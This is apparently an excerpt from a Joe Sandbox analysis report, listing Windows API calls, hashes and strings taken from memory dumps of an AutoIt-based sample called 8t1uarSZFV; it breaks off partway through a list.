            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 8f1ce98e304609e2ce6100915c0a01fe6f0355729016fd1cb1796b9a918e3878
            • Instruction ID: 03551f2e700bc9e1694d735d1c5dac39c360cd35480e9f33206c62f98b2c3712
            • Opcode Fuzzy Hash: 8f1ce98e304609e2ce6100915c0a01fe6f0355729016fd1cb1796b9a918e3878
            • Instruction Fuzzy Hash: ADE0E53390022556E63226669D01F9A364BAB427B0F0E0027BE44A6680CB65ED01B2E2
            APIs
            • FreeLibrary.KERNEL32(?,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4F6D
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FreeLibrary
            • String ID:
            • API String ID: 3664257935-0
            • Opcode ID: f828a541f1cfc6897074bd07b17ba52e83787f9032525d35fa6404df480f3154
            • Instruction ID: f76b554f2f1dc7d43f44bd3d57ef919a9fd140c4e420107360a106931dcb7ba9
            • Opcode Fuzzy Hash: f828a541f1cfc6897074bd07b17ba52e83787f9032525d35fa6404df480f3154
            • Instruction Fuzzy Hash: 31F0A0B1405342CFDB348F20D490912B7E8AF42329320997EE1EA83610C7B1A844FF00
            APIs
            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FA2DC4
              • Part of subcall function 00FA6B57: _wcslen.LIBCMT ref: 00FA6B6A
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: LongNamePath_wcslen
            • String ID:
            • API String ID: 541455249-0
            • Opcode ID: b8a40ed2097f7e74b36977e765a3e80dc61a7cb0853d79b7a0fadf466802c618
            • Instruction ID: 82d326e6991f0e296eb27d1a4d720b4f71dc586397d0b7cbb2b469a77a011800
            • Opcode Fuzzy Hash: b8a40ed2097f7e74b36977e765a3e80dc61a7cb0853d79b7a0fadf466802c618
            • Instruction Fuzzy Hash: 74E0CD726001245BC72192599C05FDA77DDDFC87D0F040071FD09E7248D974AD808690
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: __fread_nolock
            • String ID:
            • API String ID: 2638373210-0
            • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
            • Instruction ID: 9da6962685c5224d9d92397f04818194906d4556aad7f52d81ba9433d072a626
            • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
            • Instruction Fuzzy Hash: 5EE04FB0609B005FDF395A28A951BB677E89F49300F10086EF6DB93296E57268458A4D
            APIs
              • Part of subcall function 00FA3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FA3908
              • Part of subcall function 00FAD730: GetInputState.USER32 ref: 00FAD807
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00FA2B6B
              • Part of subcall function 00FA30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00FA314E
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: IconNotifyShell_$CurrentDirectoryInputState
            • String ID:
            • API String ID: 3667716007-0
            • Opcode ID: dcbe5280be3048e576da9335f7e0d0d344172f033b287a7c38a3276957997f4b
            • Instruction ID: f9f234d96b4f5ea835fcc5e03b14c0c6c4bc8dfd6da8a806108a3c162b089b83
            • Opcode Fuzzy Hash: dcbe5280be3048e576da9335f7e0d0d344172f033b287a7c38a3276957997f4b
            • Instruction Fuzzy Hash: 48E02CB2B0820807CA08BA34AC124BDB3499BD33A1F40043EF18393193CE3D8A49A322
            APIs
            • CreateFileW.KERNELBASE(00000000,00000000,?,00FE0704,?,?,00000000,?,00FE0704,00000000,0000000C), ref: 00FE03B7
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: f49e94fe38cb19ba3dfac515a734e36df34c422286c7a9c3a792a4f0a953bdce
            • Instruction ID: 65f974f28662d1fd3b1fa03a92d1134469e29ff049b9f072ff7a6149d4b6db95
            • Opcode Fuzzy Hash: f49e94fe38cb19ba3dfac515a734e36df34c422286c7a9c3a792a4f0a953bdce
            • Instruction Fuzzy Hash: D2D06C3204010DBBDF128E84DD06EDA3BAAFB48714F014000BE58A6020C736E821AB90
            APIs
            • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00FA1CBC
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: InfoParametersSystem
            • String ID:
            • API String ID: 3098949447-0
            • Opcode ID: 0762d59fdf17e215308cf9a784c644a4ae629d01f48231efb56f3186934b9d0d
            • Instruction ID: 81099d34424da31fde8afeb844dd8925fb0620945793940f36f6b5ebdd999622
            • Opcode Fuzzy Hash: 0762d59fdf17e215308cf9a784c644a4ae629d01f48231efb56f3186934b9d0d
            • Instruction Fuzzy Hash: D0C09B36680304DFF2344690BD4AF107755A348B00F048001F6CDB55C7C3B71460D750
            APIs
              • Part of subcall function 00FA5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00FA949C,?,00008000), ref: 00FA5773
            • GetLastError.KERNEL32(00000002,00000000), ref: 010176DE
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateErrorFileLast
            • String ID:
            • API String ID: 1214770103-0
            • Opcode ID: 57736e384e8898b280f0226ead8de1867055c26b77a625883431ea02e3489575
            • Instruction ID: 0f616c4522cab5a9d4a073de827250c1fbf19837ed33f15a62e96fd653e0fcb8
            • Opcode Fuzzy Hash: 57736e384e8898b280f0226ead8de1867055c26b77a625883431ea02e3489575
            • Instruction Fuzzy Hash: EA81B1706043018FDB15EF28C891BADB7E1BF89310F08496DF8C65B296DB78E945CB92
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
            • Instruction ID: 7b22f243c01199e261c7c341373e19969c229703b86a1641ba2c03a2ba5318fc
            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
            • Instruction Fuzzy Hash: F7310CB5A00109DBC718DF5AD880AA9FBA1FF49310B6486A5E805CF656D731EEC5EFC0
            APIs
            • Sleep.KERNELBASE(000001F4), ref: 00F022B1
            Memory Dump Source
            • Source File: 00000000.00000002.1708173100.0000000000F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f00000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Sleep
            • String ID:
            • API String ID: 3472027048-0
            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
            • Instruction ID: 5bc72ce5359d39b833cb47bcebec766d50564d9c9530481b46e2c6cab6baf91a
            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
            • Instruction Fuzzy Hash: 4FE0BF7494010E9FDB00EFA8D54969E7BB4EF04301F100161FD0592280D63099509A72
            APIs
              • Part of subcall function 00FB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB9BB2
            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0103961A
            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0103965B
            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0103969F
            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 010396C9
            • SendMessageW.USER32 ref: 010396F2
            • GetKeyState.USER32(00000011), ref: 0103978B
            • GetKeyState.USER32(00000009), ref: 01039798
            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 010397AE
            • GetKeyState.USER32(00000010), ref: 010397B8
            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 010397E9
            • SendMessageW.USER32 ref: 01039810
            • SendMessageW.USER32(?,00001030,?,01037E95), ref: 01039918
            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0103992E
            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 01039941
            • SetCapture.USER32(?), ref: 0103994A
            • ClientToScreen.USER32(?,?), ref: 010399AF
            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 010399BC
            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010399D6
            • ReleaseCapture.USER32 ref: 010399E1
            • GetCursorPos.USER32(?), ref: 01039A19
            • ScreenToClient.USER32(?,?), ref: 01039A26
            • SendMessageW.USER32(?,00001012,00000000,?), ref: 01039A80
            • SendMessageW.USER32 ref: 01039AAE
            • SendMessageW.USER32(?,00001111,00000000,?), ref: 01039AEB
            • SendMessageW.USER32 ref: 01039B1A
            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 01039B3B
            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 01039B4A
            • GetCursorPos.USER32(?), ref: 01039B68
            • ScreenToClient.USER32(?,?), ref: 01039B75
            • GetParent.USER32(?), ref: 01039B93
            • SendMessageW.USER32(?,00001012,00000000,?), ref: 01039BFA
            • SendMessageW.USER32 ref: 01039C2B
            • ClientToScreen.USER32(?,?), ref: 01039C84
            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 01039CB4
            • SendMessageW.USER32(?,00001111,00000000,?), ref: 01039CDE
            • SendMessageW.USER32 ref: 01039D01
            • ClientToScreen.USER32(?,?), ref: 01039D4E
            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 01039D82
              • Part of subcall function 00FB9944: GetWindowLongW.USER32(?,000000EB), ref: 00FB9952
            • GetWindowLongW.USER32(?,000000F0), ref: 01039E05
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
            • String ID: @GUI_DRAGID$F
            • API String ID: 3429851547-4164748364
            • Opcode ID: 744f4869a1abf91afef61298333656910f34a8813c142a137e4fa1a649d87f9e
            • Instruction ID: 66efb92b2eae5133f34c2208dfe01231cad0cf76d83b2240ac4c310cab6a1acd
            • Opcode Fuzzy Hash: 744f4869a1abf91afef61298333656910f34a8813c142a137e4fa1a649d87f9e
            • Instruction Fuzzy Hash: B342BF34605201AFE725CF28C844EAABBE9FF8D318F000659F6D9972A1D7B6E850DF51
            APIs
            • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 010348F3
            • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 01034908
            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 01034927
            • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0103494B
            • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0103495C
            • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0103497B
            • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 010349AE
            • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 010349D4
            • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 01034A0F
            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 01034A56
            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 01034A7E
            • IsMenu.USER32(?), ref: 01034A97
            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01034AF2
            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01034B20
            • GetWindowLongW.USER32(?,000000F0), ref: 01034B94
            • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 01034BE3
            • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 01034C82
            • wsprintfW.USER32 ref: 01034CAE
            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 01034CC9
            • GetWindowTextW.USER32(?,00000000,00000001), ref: 01034CF1
            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 01034D13
            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 01034D33
            • GetWindowTextW.USER32(?,00000000,00000001), ref: 01034D5A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
            • String ID: %d/%02d/%02d
            • API String ID: 4054740463-328681919
            • Opcode ID: c9da8dccd3fae53467ab499aebc1fcff67df7524410b806f0534bdf43d116847
            • Instruction ID: b15d3c8e105041e7c33aadf38c96e0d2d3b5dccb5e120c989007b0a7b9adced6
            • Opcode Fuzzy Hash: c9da8dccd3fae53467ab499aebc1fcff67df7524410b806f0534bdf43d116847
            • Instruction Fuzzy Hash: 9C12DC71600214ABFB259F28CD49FAE7BECAF89310F04416AF596EA2D1DB789941CB50
            APIs
            • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00FBF998
            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FFF474
            • IsIconic.USER32(00000000), ref: 00FFF47D
            • ShowWindow.USER32(00000000,00000009), ref: 00FFF48A
            • SetForegroundWindow.USER32(00000000), ref: 00FFF494
            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FFF4AA
            • GetCurrentThreadId.KERNEL32 ref: 00FFF4B1
            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FFF4BD
            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FFF4CE
            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FFF4D6
            • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00FFF4DE
            • SetForegroundWindow.USER32(00000000), ref: 00FFF4E1
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FFF4F6
            • keybd_event.USER32(00000012,00000000), ref: 00FFF501
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FFF50B
            • keybd_event.USER32(00000012,00000000), ref: 00FFF510
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FFF519
            • keybd_event.USER32(00000012,00000000), ref: 00FFF51E
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FFF528
            • keybd_event.USER32(00000012,00000000), ref: 00FFF52D
            • SetForegroundWindow.USER32(00000000), ref: 00FFF530
            • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00FFF557
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
            • String ID: Shell_TrayWnd
            • API String ID: 4125248594-2988720461
            • Opcode ID: a6fa4d02d8d6e88a65c337bb8a0790e23caf6151cf4b7a18a85a10e20f85c263
            • Instruction ID: 6576c63d319c6e7810b1f42abee0a8d71a8134259bbd7c5b40f2bb5fb844e60e
            • Opcode Fuzzy Hash: a6fa4d02d8d6e88a65c337bb8a0790e23caf6151cf4b7a18a85a10e20f85c263
            • Instruction Fuzzy Hash: 43313072A40218BAFB316BB55D4AFBF7E6CEF44B50F140066FA41F61D1C6B59900BB60
            APIs
              • Part of subcall function 010016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0100170D
              • Part of subcall function 010016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0100173A
              • Part of subcall function 010016C3: GetLastError.KERNEL32 ref: 0100174A
            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 01001286
            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 010012A8
            • CloseHandle.KERNEL32(?), ref: 010012B9
            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 010012D1
            • GetProcessWindowStation.USER32 ref: 010012EA
            • SetProcessWindowStation.USER32(00000000), ref: 010012F4
            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 01001310
              • Part of subcall function 010010BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,010011FC), ref: 010010D4
              • Part of subcall function 010010BF: CloseHandle.KERNEL32(?,?,010011FC), ref: 010010E9
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
            • String ID: $default$winsta0
            • API String ID: 22674027-1027155976
            • Opcode ID: bab02002adaaa83fc38a5305f71f952e561267a9a21039f74832bac7f9abd74b
            • Instruction ID: bc96a2758d63f58c9b9f8e382f6ea30899c4f88f6ba6d504c33740e18dc4184b
            • Opcode Fuzzy Hash: bab02002adaaa83fc38a5305f71f952e561267a9a21039f74832bac7f9abd74b
            • Instruction Fuzzy Hash: 38816D71900209ABFF229FA8DD49BEE7FB9AF04704F14415AFA90F61A0CB75D954CB60
            APIs
              • Part of subcall function 010010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01001114
              • Part of subcall function 010010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 01001120
              • Part of subcall function 010010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 0100112F
              • Part of subcall function 010010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 01001136
              • Part of subcall function 010010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0100114D
            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01000BCC
            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01000C00
            • GetLengthSid.ADVAPI32(?), ref: 01000C17
            • GetAce.ADVAPI32(?,00000000,?), ref: 01000C51
            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 01000C6D
            • GetLengthSid.ADVAPI32(?), ref: 01000C84
            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 01000C8C
            • HeapAlloc.KERNEL32(00000000), ref: 01000C93
            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 01000CB4
            • CopySid.ADVAPI32(00000000), ref: 01000CBB
            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01000CEA
            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01000D0C
            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 01000D1E
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01000D45
            • HeapFree.KERNEL32(00000000), ref: 01000D4C
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01000D55
            • HeapFree.KERNEL32(00000000), ref: 01000D5C
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01000D65
            • HeapFree.KERNEL32(00000000), ref: 01000D6C
            • GetProcessHeap.KERNEL32(00000000,?), ref: 01000D78
            • HeapFree.KERNEL32(00000000), ref: 01000D7F
              • Part of subcall function 01001193: GetProcessHeap.KERNEL32(00000008,01000BB1,?,00000000,?,01000BB1,?), ref: 010011A1
              • Part of subcall function 01001193: HeapAlloc.KERNEL32(00000000,?,00000000,?,01000BB1,?), ref: 010011A8
              • Part of subcall function 01001193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,01000BB1,?), ref: 010011B7
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
            • String ID:
            • API String ID: 4175595110-0
            • Opcode ID: 60a522a31759c7d82e6ddfd744baf12e9b7284dc18f763a33e50f6421ec8239f
            • Instruction ID: 71c345ca4ee49820295a2406b482970d2bebc81459b24b4666577035bf15b3f6
            • Opcode Fuzzy Hash: 60a522a31759c7d82e6ddfd744baf12e9b7284dc18f763a33e50f6421ec8239f
            • Instruction Fuzzy Hash: 55716A7290020AABFF219FA8DD44FEEBBBCBF05240F044556FA94E6184D775AA05CB60
            APIs
            • OpenClipboard.USER32(0103CC08), ref: 0101EB29
            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0101EB37
            • GetClipboardData.USER32(0000000D), ref: 0101EB43
            • CloseClipboard.USER32 ref: 0101EB4F
            • GlobalLock.KERNEL32(00000000), ref: 0101EB87
            • CloseClipboard.USER32 ref: 0101EB91
            • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0101EBBC
            • IsClipboardFormatAvailable.USER32(00000001), ref: 0101EBC9
            • GetClipboardData.USER32(00000001), ref: 0101EBD1
            • GlobalLock.KERNEL32(00000000), ref: 0101EBE2
            • GlobalUnlock.KERNEL32(00000000,?), ref: 0101EC22
            • IsClipboardFormatAvailable.USER32(0000000F), ref: 0101EC38
            • GetClipboardData.USER32(0000000F), ref: 0101EC44
            • GlobalLock.KERNEL32(00000000), ref: 0101EC55
            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0101EC77
            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0101EC94
            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0101ECD2
            • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0101ECF3
            • CountClipboardFormats.USER32 ref: 0101ED14
            • CloseClipboard.USER32 ref: 0101ED59
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
            • String ID:
            • API String ID: 420908878-0
            • Opcode ID: 02b11d7ae6a57d497f3aecc98f79a9d2aa2dba8c167183fb576a5401545e3e7d
            • Instruction ID: 3f5c953d62cabee013a3962c6c28bd957926e9842219c1df4554b7eb014b4a01
            • Opcode Fuzzy Hash: 02b11d7ae6a57d497f3aecc98f79a9d2aa2dba8c167183fb576a5401545e3e7d
            • Instruction Fuzzy Hash: 8A61E2752042019FE311EF28C988F2E7BE8BF89704F44445EF996D7296CB39E905CB62
            APIs
            • FindFirstFileW.KERNEL32(?,?), ref: 010169BE
            • FindClose.KERNEL32(00000000), ref: 01016A12
            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 01016A4E
            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 01016A75
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • FileTimeToSystemTime.KERNEL32(?,?), ref: 01016AB2
            • FileTimeToSystemTime.KERNEL32(?,?), ref: 01016ADF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
            • API String ID: 3830820486-3289030164
            • Opcode ID: 4cb75283938400463d6ba982bffd46e038d99b6238ccb3a563414ea10b2523d0
            • Instruction ID: 924a3905c6b8121821e61c92275961baed6f01dec425cbb3fbba20ca93f25360
            • Opcode Fuzzy Hash: 4cb75283938400463d6ba982bffd46e038d99b6238ccb3a563414ea10b2523d0
            • Instruction Fuzzy Hash: F2D15FB2508300AEC310EBA5CD91EAFB7ECAF89704F44491DF585C7191EB79DA48DB62
            APIs
            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 01019663
            • GetFileAttributesW.KERNEL32(?), ref: 010196A1
            • SetFileAttributesW.KERNEL32(?,?), ref: 010196BB
